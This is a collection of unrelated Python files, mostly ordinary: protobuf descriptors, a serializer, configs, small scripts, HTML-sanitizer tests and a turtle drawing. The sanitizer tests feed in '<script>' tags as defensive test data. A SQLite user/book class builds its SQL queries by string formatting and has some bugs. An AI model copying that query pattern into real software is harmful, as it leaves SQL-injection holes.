number=2, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chip_options', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.chip_options', index=2,
number=3, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='predict_chip_size', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.predict_chip_size', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TASKCONFIG_SEMANTICSEGMENTATIONCONFIG_CHIPOPTIONS, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1090,
serialized_end=1537,
)
_TASKCONFIG = _descriptor.Descriptor(
name='TaskConfig',
full_name='rv.protos.TaskConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='task_type', full_name='rv.protos.TaskConfig.task_type', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='predict_batch_size', full_name='rv.protos.TaskConfig.predict_batch_size', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=10,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='predict_package_uri', full_name='rv.protos.TaskConfig.predict_package_uri', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='debug', full_name='rv.protos.TaskConfig.debug', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=True,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='predict_debug_uri', full_name='rv.protos.TaskConfig.predict_debug_uri', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='object_detection_config', full_name='rv.protos.TaskConfig.object_detection_config', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chip_classification_config', full_name='rv.protos.TaskConfig.chip_classification_config', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='semantic_segmentation_config', full_name='rv.protos.TaskConfig.semantic_segmentation_config', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='custom_config', full_name='rv.protos.TaskConfig.custom_config', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TASKCONFIG_OBJECTDETECTIONCONFIG, _TASKCONFIG_CHIPCLASSIFICATIONCONFIG, _TASKCONFIG_SEMANTICSEGMENTATIONCONFIG, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='config_type', full_name='rv.protos.TaskConfig.config_type',
index=0, containing_type=None, fields=[]),
],
serialized_start=114,
serialized_end=1552,
)
_TASKCONFIG_OBJECTDETECTIONCONFIG_CHIPOPTIONS.containing_type = _TASKCONFIG_OBJECTDETECTIONCONFIG
_TASKCONFIG_OBJECTDETECTIONCONFIG_PREDICTOPTIONS.containing_type = _TASKCONFIG_OBJECTDETECTIONCONFIG
_TASKCONFIG_OBJECTDETECTIONCONFIG.fields_by_name['class_items'].message_type = rastervision_dot_protos_dot_class__item__pb2._CLASSITEM
_TASKCONFIG_OBJECTDETECTIONCONFIG.fields_by_name['chip_options'].message_type = _TASKCONFIG_OBJECTDETECTIONCONFIG_CHIPOPTIONS
_TASKCONFIG_OBJECTDETECTIONCONFIG.fields_by_name['predict_options'].message_type = _TASKCONFIG_OBJECTDETECTIONCONFIG_PREDICTOPTIONS
_TASKCONFIG_OBJECTDETECTIONCONFIG.containing_type = _TASKCONFIG
_TASKCONFIG_CHIPCLASSIFICATIONCONFIG.fields_by_name['class_items'].message_type = rastervision_dot_protos_dot_class__item__pb2._CLASSITEM
_TASKCONFIG_CHIPCLASSIFICATIONCONFIG.containing_type = _TASKCONFIG
_TASKCONFIG_SEMANTICSEGMENTATIONCONFIG_CHIPOPTIONS.containing_type = _TASKCONFIG_SEMANTICSEGMENTATIONCONFIG
_TASKCONFIG_SEMANTICSEGMENTATIONCONFIG.fields_by_name['class_items'].message_type = rastervision_dot_protos_dot_class__item__pb2._CLASSITEM
_TASKCONFIG_SEMANTICSEGMENTATIONCONFIG.fields_by_name['chip_options'].message_type = _TASKCONFIG_SEMANTICSEGMENTATIONCONFIG_CHIPOPTIONS
_TASKCONFIG_SEMANTICSEGMENTATIONCONFIG.containing_type = _TASKCONFIG
_TASKCONFIG.fields_by_name['object_detection_config'].message_type = _TASKCONFIG_OBJECTDETECTIONCONFIG
_TASKCONFIG.fields_by_name['chip_classification_config'].message_type = _TASKCONFIG_CHIPCLASSIFICATIONCONFIG
_TASKCONFIG.fields_by_name['semantic_segmentation_config'].message_type = _TASKCONFIG_SEMANTICSEGMENTATIONCONFIG
_TASKCONFIG.fields_by_name['custom_config'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_TASKCONFIG.oneofs_by_name['config_type'].fields.append(
_TASKCONFIG.fields_by_name['object_detection_config'])
_TASKCONFIG.fields_by_name['object_detection_config'].containing_oneof = _TASKCONFIG.oneofs_by_name['config_type']
_TASKCONFIG.oneofs_by_name['config_type'].fields.append(
_TASKCONFIG.fields_by_name['chip_classification_config'])
_TASKCONFIG.fields_by_name['chip_classification_config'].containing_oneof = _TASKCONFIG.oneofs_by_name['config_type']
_TASKCONFIG.oneofs_by_name['config_type'].fields.append(
_TASKCONFIG.fields_by_name['semantic_segmentation_config'])
_TASKCONFIG.fields_by_name['semantic_segmentation_config'].containing_oneof = _TASKCONFIG.oneofs_by_name['config_type']
_TASKCONFIG.oneofs_by_name['config_type'].fields.append(
_TASKCONFIG.fields_by_name['custom_config'])
_TASKCONFIG.fields_by_name['custom_config'].containing_oneof = _TASKCONFIG.oneofs_by_name['config_type']
DESCRIPTOR.message_types_by_name['TaskConfig'] = _TASKCONFIG
TaskConfig = _reflection.GeneratedProtocolMessageType('TaskConfig', (_message.Message,), dict(
ObjectDetectionConfig = _reflection.GeneratedProtocolMessageType('ObjectDetectionConfig', (_message.Message,), dict(
ChipOptions = _reflection.GeneratedProtocolMessageType('ChipOptions', (_message.Message,), dict(
DESCRIPTOR = _TASKCONFIG_OBJECTDETECTIONCONFIG_CHIPOPTIONS,
__module__ = 'rastervision.protos.task_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.TaskConfig.ObjectDetectionConfig.ChipOptions)
))
,
PredictOptions = _reflection.GeneratedProtocolMessageType('PredictOptions', (_message.Message,), dict(
DESCRIPTOR = _TASKCONFIG_OBJECTDETECTIONCONFIG_PREDICTOPTIONS,
__module__ = 'rastervision.protos.task_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.TaskConfig.ObjectDetectionConfig.PredictOptions)
))
,
DESCRIPTOR = _TASKCONFIG_OBJECTDETECTIONCONFIG,
__module__ = 'rastervision.protos.task_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.TaskConfig.ObjectDetectionConfig)
))
,
ChipClassificationConfig = _reflection.GeneratedProtocolMessageType('ChipClassificationConfig', (_message.Message,), dict(
DESCRIPTOR = _TASKCONFIG_CHIPCLASSIFICATIONCONFIG,
__module__ = 'rastervision.protos.task_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.TaskConfig.ChipClassificationConfig)
))
,
SemanticSegmentationConfig = _reflection.GeneratedProtocolMessageType('SemanticSegmentationConfig', (_message.Message,), dict(
ChipOptions = _reflection.GeneratedProtocolMessageType('ChipOptions', (_message.Message,), dict(
DESCRIPTOR = _TASKCONFIG_SEMANTICSEGMENTATIONCONFIG_CHIPOPTIONS,
__module__ = 'rastervision.protos.task_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions)
))
,
DESCRIPTOR = _TASKCONFIG_SEMANTICSEGMENTATIONCONFIG,
__module__ = 'rastervision.protos.task_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.TaskConfig.SemanticSegmentationConfig)
))
,
DESCRIPTOR = _TASKCONFIG,
__module__ = 'rastervision.protos.task_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.TaskConfig)
))
_sym_db.RegisterMessage(TaskConfig)
_sym_db.RegisterMessage(TaskConfig.ObjectDetectionConfig)
_sym_db.RegisterMessage(TaskConfig.ObjectDetectionConfig.ChipOptions)
_sym_db.RegisterMessage(TaskConfig.ObjectDetectionConfig.PredictOptions)
_sym_db.RegisterMessage(TaskConfig.ChipClassificationConfig)
_sym_db.RegisterMessage(TaskConfig.SemanticSegmentationConfig)
_sym_db.RegisterMessage(TaskConfig.SemanticSegmentationConfig.ChipOptions)
# @@protoc_insertion_point(module_scope)
| python |
from rest_framework.serializers import ModelSerializer
from .models import UploadedFile
class UploadedFileSerializer(ModelSerializer):
class Meta:
model = UploadedFile
fields = ("id" , "user_id" , "file" , "size" , "type" )
def __init__(self, *args, **kwargs):
super(UploadedFileSerializer, self).__init__(*args, **kwargs)
self.fields['size'].required = False
self.fields['type'].required = False
| python |
# Data sources
tissues = {
'TCGA': ['All'],
'GDSC': ['All']
}
projects = {
'TCGA':[None],
'GDSC': None
}
data_sources = ['GDSC', 'TCGA']
data_types = ['rnaseq']
genes_filtering = 'mini'
source = 'GDSC'
target = 'TCGA'
# TRANSACT analysis
kernel_surname = 'rbf_gamma_0_0005'
kernel_name = 'rbf'
kernel_param = {
'gamma': 0.0005
}
number_pc = {
'source': 70,
'target': 150
}
n_pv = 30
n_interpolation = 100
n_jobs = 20 | python |
import unittest
from mocks import MockUser
class TestUser(unittest.TestCase):
def testEmailNickname(self):
user = MockUser(email="[email protected]")
self.assertEquals(str(user), "foo")
def testNicknameOverride(self):
user = MockUser(email="[email protected]", nickname="bar")
self.assertEquals(str(user), "bar")
if __name__ == "__main__":
unittest.main()
| python |
#!/usr/bin/env python3
import sys
def main(phone_map, abbreviations):
phone_map = {v[0]: v[1].strip()
for v in (l.split(None, 1)
for l in open(phone_map, encoding='utf-8'))}
abbr_map = {v[0]: v[1].strip().split(',')
for v in (l.split(None, 1)
for l in open(abbreviations, encoding='utf-8') if len(l.strip()) > 0)} if abbreviations is not None else {}
o = sys.stdout.buffer
o.write(b"__(1.0) __\n")
o.write(b"_(1.0) _\n")
o.write(b"<s>(1.0)\n")
o.write(b"</s>(1.0)\n")
for word in sys.stdin.readlines():
word = word.strip()
transcriptions = []
basic = [phone_map[c] for c in word if c in phone_map]
if len(basic) > 0:
transcriptions.append(basic)
if word in abbr_map:
for abbr in abbr_map[word]:
transcriptions.append([phone_map[c] for c in abbr if c in phone_map])
transcriptions = set("".join(t) for t in transcriptions)
for trans in transcriptions:
o.write("{}({:.1f}) ".format(word, 1/len(transcriptions)).encode("utf-8"))
rtrans = "_"+trans+"_"
for i in range(1, len(trans)+1):
if rtrans[i].startswith("_"):
o.write("{} ".format(rtrans[i]).encode("iso-8859-15"))
else:
o.write("{}-{}+{} ".format(rtrans[i-1],rtrans[i],rtrans[i+1]).encode("iso-8859-15"))
o.write(b"\n")
if __name__ == "__main__":
main(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else None)
| python |
"""Tests for the HTMLSanitize preprocessor"""
from .base import PreprocessorTestsBase
from ..sanitize import SanitizeHTML
from nbformat import v4 as nbformat
class TestSanitizer(PreprocessorTestsBase):
"""Contains test functions for sanitize.py"""
maxDiff = None
def build_preprocessor(self):
"""Make an instance of a preprocessor"""
preprocessor = SanitizeHTML()
preprocessor.enabled = True
return preprocessor
def preprocess_source(self, cell_type, source, preprocessor):
nb = self.build_notebook()
res = self.build_resources()
nb.cells[0].cell_type = cell_type
nb.cells[0].source = source
nb, res = preprocessor(nb, res)
return nb.cells[0].source
def test_constructor(self):
"""Can a SanitizeHTML be constructed?"""
self.build_preprocessor()
def test_svg_handling(self):
"""
Test to make sure that svgs are handled 'properly'
We only allow <img> tags (via markdown syntax) and not all the other ways
to embed svg: <object>, <embed>, <iframe> nor inline <svg>
"""
preprocessor = self.build_preprocessor()
preprocessor.strip = True
self.assertEqual(
self.preprocess_source(
'markdown',
"""

<object data="something.svg" type="image/svg+xml"></object>
<embed data="something.svg" type="image/svg+xml" />
<iframe src="http://example.com/something.svg"></iframe>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 68 65">
<path fill="#1A374D" d="M42 27v-20c0-3.7-3.3-7-7-7s-7 3.3-7 7v21l12 15-7 15.7c14.5 13.9 35 2.8 35-13.7 0-13.3-13.4-21.8-26-18zm6 25c-3.9 0-7-3.1-7-7s3.1-7 7-7 7 3.1 7 7-3.1 7-7 7z"/>
<path d="M14 27v-20c0-3.7-3.3-7-7-7s-7 3.3-7 7v41c0 8.2 9.2 17 20 17s20-9.2 20-20c0-13.3-13.4-21.8-26-18zm6 25c-3.9 0-7-3.1-7-7s3.1-7 7-7 7 3.1 7 7-3.1 7-7 7z"/>
</svg>
""",
preprocessor
).strip(),
"""

""".strip(),
)
def test_tag_whitelist_stripping(self):
"""Test tag whitelisting + stripping out offending tags"""
preprocessor = self.build_preprocessor()
preprocessor.strip = True
self.assertEqual(
self.preprocess_source(
'markdown',
'_A_ <em>few</em> <script>tags</script>',
preprocessor
),
'_A_ <em>few</em> tags'
)
def test_comment_stripping(self):
"""Test HTML comment stripping"""
preprocessor = self.build_preprocessor()
self.assertEqual(
self.preprocess_source(
'markdown',
'_A_ <em>few</em> <!-- tags -->',
preprocessor
),
'_A_ <em>few</em> '
)
preprocessor.strip_comments = False
self.assertEqual(
self.preprocess_source(
'markdown',
'_A_ <em>few</em> <!-- tags -->',
preprocessor
),
'_A_ <em>few</em> <!-- tags -->'
)
def test_attributes_whitelist(self):
"""Test style"""
preprocessor = self.build_preprocessor()
preprocessor.attributes['a'] = ['href', 'title']
self.assertEqual(
self.preprocess_source(
'markdown',
'<a href="link" rel="nofollow">Hi</a>',
preprocessor
),
'<a href="link">Hi</a>'
)
def test_style_whitelist(self):
"""Test style"""
preprocessor = self.build_preprocessor()
if '*' in preprocessor.attributes:
preprocessor.attributes['*'].append('style')
else:
preprocessor.attributes['*'] = ['style']
preprocessor.styles = [
'color',
]
self.assertEqual(
self.preprocess_source(
'markdown',
'_A_ <em style="color: blue; background-color: pink">'
'few</em> <script>tags</script>',
preprocessor
),
'_A_ <em style="color: blue;">few</em> '
'<script>tags</script>'
)
def test_tag_passthrough(self):
"""Test passing through raw output"""
preprocessor = self.build_preprocessor()
self.assertEqual(
self.preprocess_source(
'raw',
'_A_ <em>few</em> <script>tags</script>',
preprocessor
),
'_A_ <em>few</em> <script>tags</script>'
)
def test_output_sanitizing(self):
"""Test that outputs are also sanitized properly"""
preprocessor = self.build_preprocessor()
nb = self.build_notebook()
outputs = [
nbformat.new_output("display_data", data={
'text/plain': 'b',
'text/html': '<script>more evil</script>',
'text/css': '<style> * {display:none}</style>'
}),
nbformat.new_output('stream', name='stdout', text="wat"),
nbformat.new_output('stream', name='stdout', text="<script>Evil tag</script>")
]
nb.cells[0].outputs = outputs
res = self.build_resources()
nb, res = preprocessor(nb, res)
expected_output = [
{
'data': {
'text/html': '<script>more evil</script>',
'text/plain': 'b'
},
'metadata': {},
'output_type': 'display_data',
},
{
'name': 'stdout',
'output_type': 'stream',
'text': 'wat'
},
{
'name': 'stdout',
'output_type':
'stream', 'text': '<script>Evil tag</script>'
}
]
self.assertEqual(nb.cells[0].outputs, expected_output)
def test_tag_whitelist(self):
"""Test tag whitelisting"""
preprocessor = self.build_preprocessor()
self.assertEqual(
self.preprocess_source(
'markdown',
'_A_ <em>few</em> <script>tags</script>',
preprocessor
),
'_A_ <em>few</em> <script>tags</script>'
)
| python |
'''Dois times, Cormengo e Flaminthians,
participam de um campeonato de futebol,
juntamente com outros times. Cada vitória
conta três pontos, cada empate um ponto.
Fica melhor classificado no campeonato
um time que tenha mais pontos. Em caso
de empate no número de pontos, fica
melhor classificado o time que tiver
maior saldo de gols. Se o número de
pontos e o saldo de gols forem os
mesmos para os dois times então os
dois times estão empatados no campeonato.
Dados os números de vitórias, empates,
e os saldos de gols dos dois times, sua
tarefa é determinar qual dos dois está melhor
classificado, ou se eles estão empatados no campeonato.
Desenvolva um programa que resolva este problema.
ENTRADA:
A entrada: Cv,Ce,Cs,Fv,Fe,Fs que são,
respectivamente, o número de vitórias do
Cormengo, o número de empates do Cormengo,
o saldo de gols do Cormengo, o número de
vitórias do Flaminthians, o número de
empates do Flaminthians e o saldo de gols
do Flaminthians. Leia nesta ordem, uma
variável por vez.
SAÍDA:
Seu programa deve imprimir uma única linha.
Se Cormengo é melhor classificado que
Flaminthians, a linha deve conter apenas a
letra ‘C’ (sem aspas); se Flaminthians é
melhor classificado que Cormengo, a linha
deve conter apenas a letra ‘F’ (sem aspas);
e se os dois times estão empatados, a linha
deve conter apenas o caractere ‘=' (sem aspas).
Exemplos:
Para a entrada:
10
5
18
11
1
18
A saída deve ser:
C
Para a entrada:
10
5
18
11
2
18
A saída deve ser:
= '''
# -*- coding: utf-8 -*-
import math
Cvitorias = int(input())
Cempates = int(input())
Csaldo = int(input())
Fvitorias = int(input())
Fempates = int(input())
Fsaldo = int(input())
Cvitorias*=3
Fvitorias*=3
if (Cvitorias+Cempates) > (Fvitorias+Fempates):
print('C')
if(Cvitorias+Cempates) < (Fvitorias+Fempates):
print('F')
if(Cvitorias+Cempates) == (Fvitorias+Fempates):
if Csaldo > Fsaldo:
print('C')
elif Csaldo < Fsaldo:
print('F')
elif ((Cvitorias+Cempates) == (Fvitorias+Fempates) and Csaldo == Fsaldo):
print('=')
| python |
"""
Класс данных БД
"""
import sqlite3
import os
class DbLib:
def __init__(self,namefile):
if not os.path.exists(namefile):
self.conn = sqlite3.connect(namefile, check_same_thread=False)
self.c = self.conn.cursor()
# Create table
self.c.execute('''CREATE TABLE users
(id integer, nameuser text, role text)''')
self.c.execute('''CREATE TABLE books
(id integer, idbook integer, author text, namebook text, pathbook text, currentpage integer, description text, active integer)''')
else:
self.conn = sqlite3.connect(namefile, check_same_thread=False)
self.c = self.conn.cursor()
# методы для работы с таблицей User
def add_user(self,nameuser,role):
"""
добавляем пользователя, проверяем есть ли данный пользователь в таблице Users
"""
if self.is_user(nameuser):
return False
self.c.execute("SELECT MAX(id) FROM users")
# Получаем результат сделанного запроса
id = self.c.fetchall()
#print(id[0][0])
if id[0][0] is None:
id = 1
else:
id = int(id[0][0]) +1
#print(id)
str = "INSERT INTO users (id, nameuser, role) VALUES ({0},'{1}','{2}')".format(id,nameuser,role)
#print(str)
self.c.execute(str)
self.conn.commit()
return True
def del_user(self,nameuser):
"""
удаление информации по пользователю из таблицы users
"""
command = "DELETE FROM users WHERE nameuser = '{0}'".format(nameuser)
self.c.execute(command)
self.conn.commit()
return True
def edit_user_role(self,nameuser,role):
"""
редактирование роли у пользователя nameuser
"""
command = "UPDATE users SET role='{0}' WHERE nameuser='{1}'".format(role,nameuser)
self.c.execute(command)
self.conn.commit()
return True
def is_user(self,nameuser):
"""
возвращает True - если пользователь существует
"""
self.c.execute("SELECT nameuser FROM users WHERE nameuser='{}'".format(nameuser))
user = self.c.fetchall()
#print(user)
if user == []:
return False
else:
return True
def get_id_user(self,nameuser):
"""
получение id пользователя по имени, если пользователя нет, то возвращается None
"""
if not self.is_user(nameuser):
return None
self.c.execute("SELECT id FROM users WHERE nameuser='{0}'".format(nameuser))
# Получаем результат сделанного запроса
id = self.c.fetchall()
print(id[0][0])
if id[0][0] is None:
return None
else:
id = int(id[0][0])
return id
def get_all_username(self):
"""
возвращает всех пользователей из таблицы Users, возвращает название и автор книги
"""
result=[]
self.c.execute("SELECT nameuser FROM users")
users = self.c.fetchall()
#print(users)
for user in users:
if user[0] is not None:
result.append(user[0])
return result
# END методы для работы с таблицей User
# методы для работы с таблицей Books
def set_active_book(self, idbook):
"""
устанавливаем статус активности (идет процесс чтения)
"""
command = "UPDATE books SET active='1' WHERE idbook={0}".format(idbook)
print(command)
self.c.execute(command)
self.conn.commit()
return True
def set_noactive_book(self, idbook):
"""
убираем статус активности (идет процесс чтения)
"""
command = "UPDATE books SET active='0' WHERE idbook={0}".format(idbook)
print(command)
self.c.execute(command)
self.conn.commit()
return True
def set_noactive_book(self, nameuser):
"""
убираем статус активности (идет процесс чтения)
"""
id_user = self.get_id_user(nameuser)
if id_user is None:
return result
command = "UPDATE books SET active='0' WHERE id={0}".format(id_user)
#print(command)
self.c.execute(command)
self.conn.commit()
return True
def get_currentpage_in_active_book(self, nameuser):
"""
получение номера страницы текущей книги у пользователя nameuser
"""
current_page = None
id_user = self.get_id_user(nameuser)
if id_user is None:
return current_page
command = "SELECT currentpage FROM books WHERE (id={0}) AND (active=1)".format(id_user)
self.c.execute(command)
current_page = self.c.fetchone()
if current_page[0] is None:
return current_page
return current_page[0]
def get_path_active_book(self, nameuser):
"""
получаем путь где находится текущая книга пользователя nameuser
"""
id_user = self.get_id_user(nameuser)
if id_user is None:
return None
command = "SELECT pathbook FROM books WHERE (id={0}) AND (active=1)".format(id_user)
self.c.execute(command)
path_book = self.c.fetchone()
return path_book[0]
def set_currentpage_in_active_book(self, nameuser, current_page=0):
"""
устанавливаем номер страницы current_page у пользователя nameuser активной книги
"""
id_user = self.get_id_user(nameuser)
if id_user is None:
return
command = "UPDATE books SET currentpage={0} WHERE (id={1}) AND (active=1)".format(current_page, id_user)
self.c.execute(command)
self.conn.commit()
return
def get_all_book(self, nameuser):
"""
получение списка книг пользователя nameuser
"""
result =[]
id_user = self.get_id_user(nameuser)
if id_user is None:
return result
str_command = "SELECT idbook, namebook, author FROM books WHERE id={0}".format(id_user)
self.c.execute(str_command)
result = self.c.fetchall()
return result
def add_book(self,nameuser,book):
"""
добавляем книгу пользователю nameuser.
book - это словарь с ключами namebook(название книги) , pathbook(путь до книги на диске) ,currentpage (текущая страница), author - автор книги
"""
self.c.execute("SELECT MAX(idbook) FROM books")
# Получаем результат сделанного запроса
idbook = self.c.fetchall()
#print(id[0][0])
if idbook[0][0] is None:
idbook = 1
else:
idbook = int(idbook[0][0])+1
id = self.get_id_user(nameuser)
if id is None:
return False
str = "INSERT INTO books (id, author, namebook, pathbook, currentpage, description, idbook, active) VALUES ({0},'{1}','{2}','{3}',{4},'{5}',{6},'{7}')".format(id,book["author"],book["book"],book["pathbook"],book["currentpage"],book["description"],idbook,0)
print(str)
self.c.execute(str)
self.conn.commit()
return True
def is_namebook(self,namebook):
"""
возвращает True - если название книги существует
"""
self.c.execute("SELECT namebook FROM books WHERE namebook='{}'".format(namebook))
user = self.c.fetchall()
if user == []:
return False
else:
return True
def del_book(self,namebook,author):
pass
def edit_book(self,book):
"""
book - это словарь с ключами namebook(название книги) , pathbook(путь до книги на диске) ,currentpage (текущая страница), author - автор книги
"""
pass
# END методы для работы с таблицей Books
def closedb(self):
self.conn.close()
| python |
from discord.ext import commands as cmd
import os
import util.Modular as mod
class Setup(cmd.Cog):
def __init__(self, panda):
self.panda = panda
@cmd.Cog.listener()
async def on_ready(self):
print('Successfuly initalized Panda™'+'\n'*5)
@cmd.command(help='Basic information on how to get started with Panda™')
async def setup(self, bot):
if not os.path.exists(f'servers/{bot.guild.name}/settings.txt'):
if bot.channel.name == 'console':
#generate folders for current server
directory = ['servers', f'servers/{bot.guild.name}', f'servers/{bot.guild.name}/ccdir', f'servers/{bot.guild.name}/ccogs']
for folder in directory:
if not os.path.exists(folder):
os.mkdir(folder)
#display bio
await bot.channel.send(f'Hello {bot.author.mention}, I\'m {self.panda.user.mention} !\nIn short, I am a programmer\'s ideal partner!\nI was designed to create `man-db` integration and instant `macro/script creation` into a Discord server to allow for faster software development\nPlease run `;su <character>` to assign a custom command character and finish setup')
else:
await bot.channel.send(f'{bot.author.mention}, please use a `#console` text channel to interact with this feature.')
else:
await bot.channel.send(f'Sorry {bot.author.mention}, the setup has already been completed. Please run `;reset` then run `;setup` to run the setup again or notify an administrator.')
@cmd.command(help='Define this server\'s prefix for custom commands')
async def su(self, bot, prefix):
if not os.path.exists(f'servers/{bot.guild.name}/settings.txt'):
if len(prefix)==1:
with open(f'servers/{bot.guild.name}/settings.txt', 'w') as file:
file.write(prefix + '\n')
await bot.channel.send(f'Thank you {bot.author.mention}, the first time setup is now complete. Please use `;new <name> <code>` and `;rmv <name>` to create and delete commands.\nYou can also use `;run <code>` or simply DM me to use my integrated **Python Interpreter**!')
else:
await bot.channel.send(f'Invalid input {bot.author.mention}! Please re-run `;su <character>` to assign a custom command character and finish setup')
else:
await bot.channel.send(f'Sorry {bot.author.mention}, the setup has already been completed. Please run `;reset` and then `;setup` to run the setup again or notify an administrator.')
def setup(panda):
panda.add_cog(Setup(panda))
| python |
import time
# You can edit this code and run it right here in the browser!
# First we'll import some turtles and shapes:
from turtle import *
from shapes import *
# Creating a window
window = turtle.Screen()
window.setup(400, 400)
# Create a turtle named Tommy:
tommy = Turtle()
tommy.shape("turtle")
tommy.speed(0)
# sun
draw_star(tommy, "orange", 50, -150, 140)
draw_circle(tommy, "yellow", 40, -167, 126)
# grass
draw_square(tommy, "green", 300, -200, -750)
draw_triangle(tommy, 'green', 10, -240, -158)
draw_triangle(tommy, 'green', 10, -230, -158)
draw_triangle(tommy, 'green', 10, -220, -158)
draw_triangle(tommy, 'green', 10, -210, -158)
draw_triangle(tommy, 'green', 10, -200, -158)
draw_triangle(tommy, 'green', 10, -190, -158)
draw_triangle(tommy, 'green', 10, -180, -158)
draw_triangle(tommy, 'green', 10, -170, -158)
draw_triangle(tommy, 'green', 10, -160, -158)
draw_triangle(tommy, 'green', 10, -150, -158)
draw_triangle(tommy, 'green', 10, -140, -158)
draw_triangle(tommy, 'green', 10, -130, -158)
draw_triangle(tommy, 'green', 10, -120, -158)
draw_triangle(tommy, 'green', 10, -110, -158)
draw_triangle(tommy, 'green', 10, -100, -158)
draw_triangle(tommy, 'green', 10, -90, -158)
draw_triangle(tommy, 'green', 10, -80, -158)
draw_triangle(tommy, 'green', 10, -70, -158)
draw_triangle(tommy, 'green', 10, -60, -158)
draw_triangle(tommy, 'green', 10, -70, -158)
draw_triangle(tommy, 'green', 10, -60, -158)
draw_triangle(tommy, 'green', 10, -50, -158)
draw_triangle(tommy, 'green', 10, -40, -158)
draw_triangle(tommy, 'green', 10, -30, -158)
draw_triangle(tommy, 'green', 10, -20, -158)
draw_triangle(tommy, 'green', 10, -10, -158)
draw_triangle(tommy, 'green', 10, 0, -158)
draw_triangle(tommy, 'green', 10, 10, -158)
draw_triangle(tommy, 'green', 10, 20, -158)
draw_triangle(tommy, 'green', 10, 30, -158)
draw_triangle(tommy, 'green', 10, 40, -158)
draw_triangle(tommy, 'green', 10, 50, -158)
draw_triangle(tommy, 'green', 10, 60, -158)
draw_triangle(tommy, 'green', 10, 70, -158)
# tree
draw_square(tommy, "brown", 300, 100, -168)
draw_circle(tommy, "green", 20, 100, 180)
draw_circle(tommy, "green", 30, 150, 120)
draw_circle(tommy, "green", 23, 125, 140)
# head ;)
draw_circle(tommy, 'black', 20, -2, -10)
draw_circle(tommy, 'white', 3, -7, 10)
draw_circle(tommy, 'white', 3, 5, 10)
# torso
draw_square(tommy, 'black', 3, -5, -10)
draw_square(tommy, 'black', 3, -5, -15)
draw_square(tommy, 'black', 3, -5, -20)
draw_square(tommy, 'black', 3, -5, -25)
draw_square(tommy, 'black', 3, -5, -30)
draw_square(tommy, 'black', 3, -5, -35)
draw_square(tommy, 'black', 3, -5, -40)
draw_square(tommy, 'black', 3, -5, -45)
draw_square(tommy, 'black', 3, -5, -50)
draw_square(tommy, 'black', 3, -5, -45)
draw_square(tommy, 'black', 3, -5, -50)
draw_square(tommy, 'black', 3, -5, -55)
draw_square(tommy, 'black', 3, -5, -60)
draw_square(tommy, 'black', 3, -5, -65)
# arm
draw_square(tommy, 'black', 3, -10, -30)
draw_square(tommy, 'black', 3, -15, -30)
draw_square(tommy, 'black', 3, -20, -30)
draw_square(tommy, 'black', 3, -25, -30)
draw_square(tommy, 'black', 3, -30, -30)
draw_square(tommy, 'black', 3, -35, -30)
draw_square(tommy, 'black', 3, -40, -30)
draw_square(tommy, 'black', 3, -45, -30)
# other arm lmao
draw_square(tommy, 'black', 3, 0, -30)
draw_square(tommy, 'black', 3, 5, -30)
draw_square(tommy, 'black', 3, 10, -30)
draw_square(tommy, 'black', 3, 15, -30)
draw_square(tommy, 'black', 3, 20, -30)
draw_square(tommy, 'black', 3, 25, -30)
draw_square(tommy, 'black', 3, 30, -30)
draw_square(tommy, 'black', 3, 35, -30)
# ????????
tommy.penup()
